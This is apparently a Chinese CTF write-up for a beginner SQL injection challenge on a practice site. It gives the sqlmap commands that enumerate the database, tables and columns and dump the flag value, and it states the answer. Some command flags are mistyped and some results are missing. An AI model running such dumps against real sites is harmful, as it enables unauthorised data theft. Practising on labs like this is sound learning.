今天有点时间就多写几篇解题思路吧,
希望能够帮助到那些需要帮助的人,
所有的wp都是以一题一篇的形式写出
主要是为了能够让读者更好的阅读以及查找,
希望你们不要责怪!!共勉!!!
这一题做的时间比较久,但是收获颇多!!!!
永远爱你们的————新宝宝
这个看起来有点简单!分值:10
- 来源: 西普学院
- 难度:易
- 参与人数:14133人
- Get Flag:5392人
- 答题人数:6278人
- 解题通过率:86%
很明显。过年过节不送礼,送礼就送这个
格式:
解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1
解题思路:看过视频之后,按照视频的教程解答可是怎么做就是不对,最后发现注入的网址不正确(QAQ),虽然浪费了很长的时间但是总的来说还是值得的;
首先:需要对这个网址进行手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:
如果出现错误提示,则该网站可能就存在注入漏洞)使用sqlmap爆出当前数据库:
使用命令:python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db得到当前数据库:my_db
发现可能存在key于是输入命令:
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db—tables
得到:
再继续:
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns就会得到:
然后把k0y里面值爆出来就好:需要输入:
python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
最后得到答案:whatiMyD91dump